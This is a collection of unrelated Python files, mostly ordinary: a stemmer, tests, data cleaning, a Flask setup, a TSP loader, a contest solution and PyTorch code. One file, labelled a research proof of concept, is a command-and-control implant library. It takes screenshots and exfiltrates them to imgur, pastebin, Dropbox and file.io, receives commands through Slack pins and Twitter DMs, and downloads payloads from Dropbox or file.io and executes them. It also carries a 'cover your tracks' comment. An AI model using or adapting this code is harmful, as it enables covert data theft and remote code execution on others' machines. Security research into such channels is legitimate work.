            'ist': {"with": ['ism', 'ed', 'ical', 'y', 'ium', 'est', 'ic', 'e', 'o', 'al', 'a', ''], "exception": ["mist", "agonist", "assist", "list", "backlist", "ballist", "banist", "bannist", "barrist", "batist", "booklist", "canist", "casuist", "checklist", "christ", "cist", "fist", "closefist", "exist", "coexist", "consist", "delist", "desist", "enlist", "twist", "entwist", "feist", "filist", "foist", "gist", "grist","hagadist", "heist", "heurist", "hist", "hoist", "inconist", "insist", "intwist", "resist", "irresist", "joist", "kist", "legist", "logist", "magist", "maist", "minist", "modist", "moist", "specialist", "sophist", "statist", "waist", "pantywaist", "persist", "poltergeist", "preenlist", "preexist", "regist", "protist", "reenlist", "relist", "shirtwaist", "shist", "sinist", "subsist", "tourist", "underwaist", "unlist", "untwist", "whist", "wist", "wrist", "zeitgeist"]},
            'ism': {"with": ['ist', 'ic', ''], "exception": ["tourism"]},
        }
        # Caller-supplied rules override/extend the defaults.
        self.suffix_rule_list.update(suffix_rule_list)
        # Longest-suffix-first order so e.g. 'atori' is tried before 'ori'.
        self.suffix_list = sorted(list(self.suffix_rule_list.keys()), key=lambda x: -len(x))
    def __stem(self, word, return_snowball=False):
        """Stem *word*: normalize -ise/-ize spelling, run Snowball, then apply
        at most one suffix-rewrite rule validated against the word list.

        Returns the stem, or a (stem, snowball_stem) pair when
        *return_snowball* is true. Falls back to the Snowball stem when the
        rewritten stem would be shorter than 3 characters.
        """
        if not word.startswith("improv"):
            # Normalize British -isate* spellings to -izate* unconditionally.
            remove_suffix = {"isate":"izate", "isated":"izated", "isating":"izating", "isates":"izates"}
            for key in remove_suffix.keys():
                if word.endswith(key):
                    word = word[:-len(key)] + remove_suffix[key]
                    break
            # Normalize -ise* to -ize* only when the -ize* form is a known word.
            remove_suffix = {"ise":"ize", "ised":"ized", "ising":"izing", "ises":"izes"}
            for key in remove_suffix.keys():
                if word.endswith(key):
                    new_word = word[:-len(key)] + remove_suffix[key]
                    if new_word in self.word_list:
                        word = new_word
                    break
        word = self.stemmer.stem(word)
        stem_word = word
        num = 0
        # Skip the rewrite pass for special-word stems and very short stems.
        if word not in list(self.stemmer._EnglishStemmer__special_words.keys()) + list(self.stemmer._EnglishStemmer__special_words.values()) and len(word) >= 3:
            while num < len(self.suffix_list):
                if stem_word.endswith(self.suffix_list[num]) and stem_word not in self.suffix_rule_list[self.suffix_list[num]]["exception"]:
                    without_suffix = stem_word[:-len(self.suffix_list[num])]
                    if len(without_suffix) == 0:
                        num += 1
                        continue
                    # Accept the strip when some "with" entry's replacements all
                    # validate: '+' separates required forms, a '-' prefix means
                    # the form must NOT appear in the word list.
                    for el in self.suffix_rule_list[self.suffix_list[num]]["with"]:
                        el = el.replace("+", " ")
                        el = el.replace("-", " -") if "-" in el and " -" not in el else el
                        el = el.split(" ")
                        key = True
                        for el1 in el:
                            if not ((without_suffix + el1 in self.word_list and not el1.startswith("-")) or (without_suffix + el1.replace("-", "") not in self.word_list and el1.startswith("-"))):
                                key = False
                                break
                        if key:
                            stem_word = without_suffix
                            break
                    # Only the first (longest) matching suffix is considered.
                    break
                num += 1
        return (stem_word, word) if return_snowball else stem_word if len(stem_word) >= 3 else word
# Module-level singleton; construction loads the NLTK 'words' corpus.
partstem = ParticleStemmer()
| 12,492 | 5,695 |
import os
from abacusevents.utils import env, lowercase_first
def test_env_is_short_for_os_dot_environ():
    """env() should read values straight from os.environ."""
    os.environ['FOO'] = 'BAR'
    assert env('FOO') == 'BAR'
def test_env_lets_you_specify_a_default_value():
    """env() should fall back to the supplied default when the key is unset."""
    default = env('NOT_THERE', 'FOO')
    assert default == 'FOO'
def test_env_wont_explode():
    """env() should return None (not raise) for a missing key with no default."""
    assert env('NOTHING') is None
def test_lowercase_first():
    """lowercase_first() lowercases only the first character of a string and
    returns '' for any falsy or non-string input."""
    assert lowercase_first('Ping') == 'ping'
    assert lowercase_first('') == ''
    assert lowercase_first('fOO') == 'fOO'
    # Non-string / falsy inputs all collapse to the empty string.
    assert lowercase_first(None) == ''
    assert lowercase_first(False) == ''
    assert lowercase_first([]) == ''
    assert lowercase_first([1]) == ''
    assert lowercase_first((1,)) == ''
| 700 | 253 |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
def LoadnClean (path):
    """Load the credit-card default CSV at *path* and return a cleaned frame.

    Steps: drop blank/NaN rows, drop the first row (it holds textual column
    labels rather than data), rename X1..X23/Y to descriptive names, decode
    the categorical codes, remove rows with unknown Education/Marital codes,
    and collapse the monthly columns into Payment_Score / Avg_Outstanding /
    Avg_Paid summaries.
    """
    import pandas as pd
    df = (
        pd.read_csv(path, index_col=0)
    )
    # Treat empty strings as missing and drop incomplete rows.
    df1 = ( df
           .replace("", float("NaN"))
           .dropna()
           .reset_index(drop=True)
           )
    # BUG FIX: the original rename mapping listed "X6" twice ("Pay/Sept07"
    # then "PayStat/Sept05"); the first entry was dead and has been removed.
    df2 = ( df1
           .drop(index=df1.index[0])  # first row holds column labels, not data
           .rename(columns={"X1": "Credit Limit",
                            "X2": "Sex",
                            "X3": "Education",
                            "X4": "Marital Status",
                            "X5": "Age",
                            "X6": "PayStat/Sept05",
                            "X7": "PayStat/Aug05",
                            "X8": "PayStat/Jul05",
                            "X9": "PayStat/Jun05",
                            "X10": "PayStat/May05",
                            "X11": "PayStat/Apr05",
                            "X12": "Outstanding/Sept05",
                            "X13": "Outstanding/Aug05",
                            "X14": "Outstanding/Jul05",
                            "X15": "Outstanding/Jun05",
                            "X16": "Outstanding/May05",
                            "X17": "Outstanding/Apr05",
                            "X18": "Paid/Sept05",
                            "X19": "Paid/Aug05",
                            "X20": "Paid/Jul05",
                            "X21": "Paid/Jun05",
                            "X22": "Paid/May05",
                            "X23": "Paid/Apr05",
                            "Y": "Default"
                            })
           .apply(pd.to_numeric)
           # Decode the categorical integer codes; unknown codes are marked
           # "Delete" and filtered out below.
           .replace({'Sex': {1: "M", 2: 'F'}})
           .replace({'Education': {1: "MSc or PHd", 2: 'BSc', 3: 'High School Diploma', 4: "Other", 5: "Delete", 6: "Delete", 0: "Delete"}})
           .replace({'Marital Status': {1: "Married", 2: 'Single', 3: 'Other', 0: "Delete"}})
           .replace({'Default': {1: "True", 0: 'False'}})
           .loc[lambda row: ~row['Education'].str.contains('Delete')]
           .loc[lambda row: ~row['Marital Status'].str.contains('Delete')]
           )
    # Summarize the six monthly columns of each family into a single feature.
    # (+6 shifts the -1..8 payment-status codes to a positive scale.)
    df3 = ( df2
           .assign(Payment_Score=(df2["PayStat/Sept05"]+df2['PayStat/Aug05']+df2['PayStat/Jul05']+df2['PayStat/Jun05']+df2['PayStat/May05']+df2['PayStat/Apr05']+6)/6)
           .assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
           .assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
           .drop(["PayStat/Jun05", "PayStat/Sept05", "PayStat/Aug05", "PayStat/Jul05", "PayStat/May05", "PayStat/Apr05"], axis=1)
           .drop(["Outstanding/Sept05", "Outstanding/Aug05", "Outstanding/Apr05", "Outstanding/Jul05", "Outstanding/Jun05", "Outstanding/May05"], axis=1)
           .drop(["Paid/Sept05", "Paid/Aug05", "Paid/Apr05", "Paid/Jul05", "Paid/Jun05", "Paid/May05"], axis=1)
           .reindex(columns=["Credit Limit", "Sex", "Education", "Marital Status", "Age", "Payment_Score", "Avg_Outstanding", "Avg_Paid", "Default"])
           )
    return df3
def AgevsDefault (df):
    """Plot, per Age, the percentage split of Default outcomes as a bar chart."""
    # NOTE(review): pd/plt/np are imported but only sns is used here.
    import pandas as pd
    import seaborn as sns
    import matplotlib.pyplot as plt
    import numpy as np
    x,y = 'Age', 'Default'
    # Normalize Default counts within each Age group to percentages,
    # then hand the flattened frame to seaborn's catplot.
    (df
    .groupby(x)[y]
    .value_counts(normalize=True)
    .mul(100)
    .rename('percent')
    .reset_index()
    .pipe((sns.catplot,'data'), x=x,y='percent',height=5,aspect=3,hue=y,kind='bar'))
def JustPayments(path):
    """Load the credit-card default CSV at *path* keeping the payment columns.

    Unlike LoadnClean, demographic columns (Sex / Marital Status / Education)
    are dropped and the six monthly PayStat codes are kept (shifted by +1)
    alongside the Payment_Score / Avg_Outstanding / Avg_Paid summaries.
    """
    import pandas as pd
    df1 = (
        pd.read_csv(path, index_col=0)
    )
    # BUG FIX: the original rename mapping listed "X6" twice ("Pay/Sept07"
    # then "PaySep"); the first entry was dead and has been removed.
    df2 = ( df1
           .drop(index=df1.index[0])  # first row holds column labels, not data
           .rename(columns={"X1": "Credit Limit",
                            "X2": "Sex",
                            "X3": "Education",
                            "X4": "Marital Status",
                            "X5": "Age",
                            "X6": "PaySep",
                            "X7": "PayAug",
                            "X8": "PayJul",
                            "X9": "PayJun",
                            "X10": "PayMay",
                            "X11": "PayApr",
                            "X12": "Outstanding/Sept05",
                            "X13": "Outstanding/Aug05",
                            "X14": "Outstanding/Jul05",
                            "X15": "Outstanding/Jun05",
                            "X16": "Outstanding/May05",
                            "X17": "Outstanding/Apr05",
                            "X18": "Paid/Sept05",
                            "X19": "Paid/Aug05",
                            "X20": "Paid/Jul05",
                            "X21": "Paid/Jun05",
                            "X22": "Paid/May05",
                            "X23": "Paid/Apr05",
                            "Y": "Default"
                            })
           .apply(pd.to_numeric) )
    # Summaries computed from the raw (unshifted) monthly values.
    df3 = ( df2
           .assign(Payment_Score=(df2["PaySep"]+df2['PayAug']+df2['PayJul']+df2['PayJun']+df2['PayMay']+df2['PayApr']+6)/6)
           .assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
           .assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
           .drop(["Sex", "Marital Status", "Education"], axis=1)
           )
    # Shift the -1..8 payment-status codes up by one so they start at 0.
    for pay_col in ("PaySep", "PayAug", "PayJul", "PayJun", "PayMay", "PayApr"):
        df3[pay_col] = df3[pay_col] + 1
    return df3
def Defaulters(df):
    """Return only the rows flagged as defaulters (Default == 1)."""
    defaulted = df['Default'] == 1
    return df[defaulted]
| 6,340 | 2,203 |
from flask import Flask
import os
# Resolve template/static folders to absolute paths so the app finds them
# regardless of the current working directory.
templates_folder = os.path.abspath("application/view/templates")
static_folder = os.path.abspath("application/view/static")
app = Flask(__name__,template_folder=templates_folder,static_folder=static_folder)
# Imported for its side effect: registers the routes on `app`.
from application.controller import hello_controller
#Just a simple script to automate the YAML front matter in new posts
# NOTE(review): this is a Python 2 script (raw_input, print statements) —
# it will not run unmodified under Python 3.
import datetime
import os
# Derive the file name from the post title: spaces -> underscores, lowercased.
title = raw_input('\nEnter title: ')
fileName= title.replace(" ", "_").lower() + '.md'
print fileName + '\n'
# Jekyll-style YAML front matter; the title fills both the post title and
# the client_name fields.
text = """---
layout: project
title: {}
date: Feb 2015
thumbnail: http://devchuk.github.io/devchukV1/res/img/portimg/parrot/prof.jpg
thumbnail_size: half-img
client: PROJECT
client_name: {}
role: Full-stack developer
platforms: Web
status: Active
featured: True
desc: Here is a medium-length description about the project.
---
""".format(title, title)
file = open(fileName, "w")
file.write(text)
print '\nFile is generated!'
# Open the freshly generated post in the Atom editor.
os.system("atom " + fileName)
# -*- coding: utf-8 -*-
'''pre load default TSP city data into database'''
from django.db.transaction import atomic
from ..models import *
import os
@atomic
def atomic_save(items):
    """Persist every model instance in *items* within a single DB transaction."""
    for record in items:
        record.save()
# Load default city data
def load_cities(cities_folder_path, delete=False):
    '''
    Load data files in cities_folder_path to database
    if delete is True, previous data in database will be deleted

    Files are parsed as TSPLIB instances opened in binary mode; only
    two-dimensional Euclidean (EUC_2D) instances are accepted. Parse errors
    are printed and the offending file is skipped.
    '''
    if delete:
        print('\nDeleting all previous city data...')
        City.objects.all().delete()
        print('Deletion completes\n')
    print('Adding city data...\n')
    cities = []
    print('Loading %s ...' % cities_folder_path)
    for root, dirs, files in os.walk(cities_folder_path):
        for name in files:
            filePath = os.path.join(root, name)
            print('Loading %s ...' % filePath)
            in_node_section = False
            try:
                with open(filePath, mode='rb') as f:
                    for line in f:
                        # Check dimension info.
                        # BUG FIX: the original searched for b'EDGE_WEIGHT_TYPE\n',
                        # which never matches a line that also carries the value,
                        # and called line.split(':') with a str separator on
                        # bytes, which raises TypeError. Both corrected here.
                        if line.find(b'EDGE_WEIGHT_TYPE') != -1:
                            if line.split(b':')[-1].find(b'EUC_2D') == -1:
                                raise Exception('Only two-dimension supported.')
                        # Start processing nodes after the coordinate header.
                        if line.find(b'NODE_COORD_SECTION') != -1:
                            in_node_section = True
                            continue
                        if line.find(b'EOF') != -1:
                            break
                        if in_node_section:
                            # Each node line is "<id> <x> <y>".
                            fields = str(line, encoding='utf-8').split(' ')
                            cities.append(City(
                                id = fields[0],
                                X = fields[1],
                                Y = fields[2]
                            ))
            except Exception as result:
                print('Err:%s' % result)
    print('\nSaving city data...')
    atomic_save(cities)
    # NOTE(review): "complates" is a typo in the original user-facing message;
    # left unchanged to avoid altering runtime output.
    print('Save complates')
def pre_load_data(currentPath):
    """Load the bundled 'Cities' folder under *currentPath*, wiping prior data."""
    cities_dir = os.path.join(currentPath, 'Cities')
    load_cities(cities_dir, True)
| 1,820 | 566 |
# Copyright 2019 Netskope, Inc.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Written by Erick Galinkin
#
# This code is a proof of concept intended for research purposes only. It does not contain any payloads. It is not
# weaponized.
import requests
import utils
import time
import tempfile
import shutil
import base64
import os
import tweepy
from tweepy.api import API
import json
# Impersonate a desktop Chrome browser so the HTTP requests below blend in
# with ordinary web traffic.
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
             "Chrome/74.0.3729.169 Safari/537.36"
def imgur_capture_screen(creds, sleep=0, admin=False):
    """
    Capture the screen after (optionally) sleeping ``sleep`` seconds and
    upload the capture to imgur.

    Args:
        creds: imgur Client-ID used for the anonymous upload.
        sleep: seconds to wait before taking the screenshot.
        admin: when True, write the screenshot to a private temp directory
            (removed wholesale afterwards); otherwise write to the current
            directory and remove just the file.

    Returns:
        The imgur link, or "Upload failed" (see imgur_upload_image).
    """
    time.sleep(sleep)
    if admin:
        # Private scratch directory, cleaned up below with rmtree.
        tempdir = tempfile.mkdtemp()
        fname = utils.screenshot(tempdir, "screencap.png")
    else:
        fname = utils.screenshot("./", "screencap.png")
    link = imgur_upload_image(fname, creds)
    # Remove the local copy of the capture in either case.
    if admin:
        shutil.rmtree(tempdir)
    else:
        os.remove(fname)
    return link
def imgur_upload_image(image_path, creds):
    """
    Upload the image at ``image_path`` to imgur via the v3 API.

    Args:
        image_path: path of the image file; also reused as the upload title.
        creds: imgur Client-ID.

    Returns:
        The direct imgur link on success, or the string "Upload failed".
    """
    url = "https://api.imgur.com/3/image"
    headers = {
        'user-agent': user_agent,
        'authorization': 'Client-ID {}'.format(creds)
    }
    try:
        # The v3 image endpoint accepts a base64-encoded payload.
        r = requests.post(
            url,
            headers=headers,
            data={
                'image': base64.b64encode(open(image_path, 'rb').read()),
                'title': image_path
            }
        )
        data = r.json()
        return data['data']['link']
    except Exception:
        # Network, JSON, and missing-key errors all collapse into one
        # sentinel string for the caller.
        return "Upload failed"
def get_keys():
    """
    Fetch API credentials from the first reachable URL listed in urls.txt.

    urls.txt holds one "<Method> <url>" pair per line, e.g.::

        Slack <url to get slack token>
        Twitter <url to get twitter keys>

    Returns:
        (method, key): the service name and the raw token text (for
        Twitter, a tuple split on ';'), or (None, None) when no URL could
        be fetched.
    """
    # TODO: Have a better way to get keys - maybe CLI arguments
    # Could probably hard code the urls, but this makes it so we can just
    # not commit the urls to the repo.
    f = open("urls.txt")
    urls = [line.strip().split(" ") for line in f]
    f.close()
    # Cover your tracks a little bit buddy
    # os.remove("urls.txt")
    headers = {
        'user-agent': user_agent
    }
    for url in urls:
        try:
            method = url[0]
            r = requests.get(
                url[1],
                headers=headers
            )
            key = r.text.strip()
            if method == "Twitter":
                # Twitter needs four values; they arrive ';'-separated.
                key = tuple(key.split(";"))
            # First successful fetch wins.
            return method, key
        except Exception:
            # Unreachable URL: fall through to the next candidate.
            pass
    return None, None
def pastebin_paste_file_contents(devkey, filepath):
    """
    Paste the text contents of ``filepath`` to pastebin.

    Args:
        devkey: pastebin api_dev_key.
        filepath: file whose text is pasted.

    Returns:
        The raw response body (the paste URL on success; pastebin returns
        an error string otherwise).
    """
    url = "https://pastebin.com/api/api_post.php"
    headers = {
        'user-agent': user_agent
    }
    with open(filepath, "r") as f:
        contents = f.read()
    args = {
        "api_dev_key": devkey,
        "api_option": "paste",
        "api_paste_code": contents
    }
    r = requests.post(
        url,
        headers=headers,
        data=args
    )
    link = r.text
    return link
def github_get_commands(gist_location):
    """
    Fetch the raw text of a gist and return it as the command string.

    NOTE(review): ``headers`` is passed positionally below, so it binds to
    requests.get's second parameter (``params``), not ``headers`` — the
    custom user-agent is never actually sent. Confirm intent.
    """
    headers = {
        'user-agent': user_agent
    }
    r = requests.get(
        gist_location,
        headers
    )
    command = r.text
    return command
def dropbox_download_exec(creds, filepath):
    """
    Download ``filepath`` from Dropbox, run it as ./asdf, then delete it.

    NOTE(review): the payload is written via r.text.encode(), which will
    mangle any non-UTF-8 binary; content downloads are bytes (r.content).
    Confirm intent.
    """
    url = "https://content.dropboxapi.com/2/files/download"
    headers = {
        "Authorization": "Bearer {}".format(creds),
        # Dropbox content endpoints take their arguments as a JSON header.
        "Dropbox-API-Arg": "{\"path\":\"" + filepath + "\"}"
    }
    r = requests.post(url, headers=headers)
    with open("asdf", "wb") as f:
        f.write(r.text.encode())
    os.system("chmod 777 asdf")
    os.system("./asdf")
    os.remove("asdf")
def dropbox_upload(creds, cname, filepath):
    """
    Upload ``filepath`` into the Dropbox folder /<cname>, creating the
    folder on demand.

    Returns:
        True when the upload returned HTTP 200, False otherwise, or None
        when the folder could not be found/created.
    """
    if not dropbox_folder_check(creds, cname):
        return None
    url = "https://content.dropboxapi.com/2/files/upload"
    fname = os.path.basename(filepath)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/octet-stream",
        'Authorization': "Bearer {}".format(creds),
        "Dropbox-API-Arg": "{\"path\":\"/" + cname.lower() + "/" + fname.lower() + "\",\"autorename\":true}"
    }
    data = open(filepath, "rb").read()
    r = requests.post(
        url,
        headers=headers,
        data=data
    )
    return r.status_code == 200
def dropbox_folder_check(creds, folder_name):
    """
    Ensure the Dropbox folder /<folder_name> exists, creating it if needed.

    Returns:
        True when the folder exists (or was created), False otherwise.
    """
    url = "https://api.dropboxapi.com/2/files/list_folder"
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
        'Authorization': "Bearer {}".format(creds),
    }
    content = {
        "path": "/{}".format(folder_name.lower())
    }
    r = requests.post(
        url,
        headers=headers,
        data=json.dumps(content)
    )
    if r.status_code != 200:
        # list_folder failed: assume the folder is missing and create it.
        url = "https://api.dropboxapi.com/2/files/create_folder_v2"
        r = requests.post(
            url,
            headers=headers,
            data=json.dumps(content)
        )
        if r.status_code != 200:
            return False
    return True
def slack_checkin(creds, sysinfo):
    """
    Post ``sysinfo`` to the workspace's #general channel and return that
    channel's pinned command list.

    Returns:
        The pinned commands (list of lines) on success, else None (also
        None when no channel named 'general' exists).
    """
    url = "https://slack.com/api/conversations.list?token={}".format(creds)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json"
    }
    r = requests.get(
        url,
        headers=headers
    )
    data = r.json()
    for channel in data['channels']:
        if channel['name'] == 'general':
            channel_id = channel['id']
            resp = slack_post_to_channel(channel_id, creds, sysinfo)
            if resp is not None:
                pin = slack_get_pins(channel_id, creds)
                return pin
    return None
def slack_upload_file(channel, creds, file):
    """
    Upload ``file`` to a Slack channel via files.upload.

    Returns:
        The private download URL Slack assigns to the uploaded file.
    """
    url = "https://slack.com/api/files.upload"
    headers = {
        'user-agent': user_agent,
        'Authorization': "Bearer {}".format(creds)
    }
    content = {
        'file': (file, open(file, 'rb')),
        'initial_comment': file,
        'channels': channel,
    }
    r = requests.post(
        url,
        headers=headers,
        files=content
    )
    data = r.json()
    link = data['file']['url_private_download']
    return link
def slack_create_channel(channel_name, creds):
    """Create a Slack channel; returns its id, or None when not ok."""
    url = "https://slack.com/api/channels.create?token={}&name={}".format(creds, channel_name)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
    }
    r = requests.post(
        url,
        headers=headers
    )
    data = r.json()
    if data["ok"]:
        return data["channel"]["id"]
def slack_get_commands(channel, creds):
    """
    Return the newest message in ``channel`` split into lines, or None when
    it was a bot message (i.e. posted by us) or the API call failed.
    """
    # We could probably listen and use the Events API but that sounds a lot
    # like hosting an HTTP server on localhost
    url = "https://slack.com/api/conversations.history?token={}&channel={}&limit=1".format(creds, channel)
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/x-www-form-urlencoded"
    }
    r = requests.get(
        url,
        headers=headers
    )
    data = r.json()
    if data["ok"]:
        # Skip messages posted by a bot (our own check-ins).
        if "subtype" in data['messages'][-1].keys():
            if data['messages'][-1]['subtype'] == "bot_message":
                return None
        cmd = data["messages"][-1]["text"]
        cmd = cmd.split("\n")
        return cmd
    else:
        return None
def slack_get_pins(channel, creds):
    """
    Return the text of the first pinned item in ``channel`` split into
    lines; implicitly None when the API reports not ok.
    """
    url = "https://slack.com/api/pins.list?token={}&channel={}".format(creds, channel)
    headers = {
        'user-agent': user_agent
    }
    r = requests.get(
        url,
        headers=headers
    )
    data = r.json()
    if data['ok']:
        pin_cmd = data['items'][0]['message']['text']
        pin_cmd = pin_cmd.split("\n")
        return pin_cmd
def slack_post_to_channel(channel, creds, message):
    """
    Post ``message`` to ``channel`` via chat.postMessage.

    Returns:
        The channel id on success, None on failure.
    """
    url = "https://slack.com/api/chat.postMessage"
    headers = {
        'user-agent': user_agent,
        'Content-type': "application/json",
        'Authorization': "Bearer {}".format(creds)
    }
    content = {
        "channel": channel,
        "text": message
    }
    r = requests.post(
        url,
        headers=headers,
        json=content
    )
    data = r.json()
    if data["ok"]:
        return channel
    else:
        return None
# TODO: handle the API objects better so we don't get rate limited all the time
def twitter_checkin(creds, sysinfo):
    """Tweet ``sysinfo`` as a status update; returns a one-item marker list."""
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    api.update_status(sysinfo)
    return ["twitter_checkin"]
def twitter_get_commands(creds):
    """
    Return the text of the newest of the last 3 DMs that was NOT sent
    through this app (no source_app_id), or None when all were.
    """
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    dms = api.list_direct_messages(3)
    for dm in dms:
        if "source_app_id" not in dm.message_create.keys():
            command = dm.message_create['message_data']['text']
            return command
    return None
def twitter_post_response(creds, message, user):
    """Send ``message`` to ``user`` as a direct message; always returns True."""
    consumer_key, consumer_secret, access_token, access_token_secret = creds
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = API(auth, wait_on_rate_limit=True)
    api.send_direct_message(user, message)
    return True
def fileio_upload(filepath):
    """Upload ``filepath`` to file.io and return its one-time download link."""
    files = {
        'file': (filepath, open(filepath, 'rb')),
    }
    headers = {
        'user-agent': user_agent
    }
    r = requests.post(
        'https://file.io/',
        files=files,
        headers=headers
    )
    data = r.json()
    return data['link']
def fileio_download_exec(filekey):
    """
    Download the file.io payload ``filekey``, run it as ./asdf, delete it.

    NOTE(review): writes r.text.encode(), which corrupts non-UTF-8 binary
    content (r.content is the raw bytes) — confirm intent.
    """
    url = "https://file.io/{}".format(filekey)
    headers = {
        'user-agent': user_agent
    }
    r = requests.get(
        url,
        headers=headers
    )
    with open("asdf", "wb") as f:
        f.write(r.text.encode())
    os.system("chmod 777 asdf")
    os.system("./asdf")
    os.remove("asdf")
| 11,725 | 3,886 |
def test_response_is_json(self):
    """Replay the recorded request and assert its JSON body equals
    ``expected``. (This is a code-generation template: the {{ ... }}
    placeholders are filled from the captured request when rendered.)"""
    from json import loads
    response = self.client.{{ request.method|lower }}('{{ request.path }}', data={{ request.data|safe }})
    self.assertFalse(response.streaming)
    # Parsing here means a non-JSON body raises (test Error, E) rather than
    # merely failing an assertion (F).
    content = loads(response.content)
    expected = {} # TODO: Fill this in to make the test pass
    self.assertEqual(content, expected)
| 413 | 113 |
import mysql.connector
# NOTE(review): placeholder credentials — load real values from config or
# environment variables; never commit them.
mydb = mysql.connector.connect(
    host="databaseurl",
    user="username",
    password="password",
    database="database_name",
)
mycursor = mydb.cursor()
# WARNING: executes arbitrary SQL typed by the operator. That is the point
# of this mini console, but never route untrusted input through here.
code = input("Enter SQL code here ")
sql = code
mycursor.execute(sql)
mydb.commit()
# rowcount reflects rows affected by the last statement; the message is
# only accurate for INSERTs.
print(mycursor.rowcount, "record inserted.")
| 308 | 102 |
"""
URL: https://codeforces.com/problemset/problem/451/B
Author: Safiul Kabir [safiulanik at gmail.com]
Tags: implementation, sortings, *1300
"""
def main():
    """
    Codeforces 451B "Sort the Array": decide whether reversing exactly one
    segment makes the array sorted; print "yes" plus the 1-based segment,
    or "no".
    """
    n = int(input())
    ll = list(map(int, input().split()))
    start, end = -1, -1
    # Find the first index where the array stops being non-decreasing.
    for i in range(n - 1):
        if ll[i] > ll[i + 1]:
            start = i + 1
            break
    if start == -1:
        # Already sorted: reversing the trivial segment [1, 1] works.
        print('yes')
        print('1 1')
        return
    # Extend the decreasing run to find where the reversed segment ends.
    for i in range(start, n - 1):
        if ll[i] < ll[i + 1]:
            end = i + 1
            break
    if start > -1 and end == -1:
        # The decreasing run reaches the end of the array.
        end = n
    # Every prefix element must not exceed the segment's last element
    # (which becomes its first after reversal).
    for i in range(start - 1):
        if ll[i] > ll[end - 1]:
            print('no')
            break
    else:
        # The suffix must stay sorted and never drop below the segment's
        # first element (the segment's max).
        for i in range(end, n):
            if ll[i] < ll[start - 1] or (i < n - 1 and ll[i] > ll[i + 1]):
                print('no')
                break
        else:
            print('yes')
            print(f'{start} {end}')
main()
| 941 | 352 |
from .ibm_cos import IBMCloudObjectStorageBackend as StorageBackend
| 68 | 18 |
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 7 22:03:24 2021
@author: lankuohsing
"""
import numpy as np
import torch.utils.data as Data
import torch
from collections import OrderedDict
from torchsummary import summary
# In[]
data1=[]
labels1=[]
data2=[]
labels2=[]
with open("./dataset/4_class_data_2d.txt",'r',encoding="UTF-8") as rf:
for line in rf:
split_list=line.strip().split(" ")
x=float(split_list[0])
y=float(split_list[1])
label=int(split_list[2])
if (x-2)**2+(y-2)**2<=0.5**2:
data2.append([x,y])
labels2.append([label-1])
else:
data1.append([x,y])
labels1.append([label-1])
# In[]
class_num=4
features=torch.tensor(data1,dtype=torch.float)
labels=torch.tensor(labels1,dtype=torch.long)
one_hot_labels=torch.zeros(len(labels),class_num).scatter_(1,labels,1)
batch_size=64
# 将训练数据的特征和标签组合
dataset=Data.TensorDataset(features,one_hot_labels)
# 随机读取小批量
train_loader=Data.DataLoader(dataset,batch_size,shuffle=True)
test_loader=train_loader
epochs=100
# In[]
num_inputs=2
num_outputs=4
class LinearNet(torch.nn.Module):
    """A single linear layer that flattens each sample before projecting."""

    def __init__(self, num_inputs, num_outputs):
        super(LinearNet, self).__init__()
        self.linear = torch.nn.Linear(num_inputs, num_outputs)

    def forward(self, x):
        # x: (batch, num_inputs); flatten any trailing dims per sample.
        flat = x.view(x.shape[0], -1)
        return self.linear(flat)
# Softmax regression as a named Sequential (single linear layer).
softmax_regression=torch.nn.Sequential(
    OrderedDict([
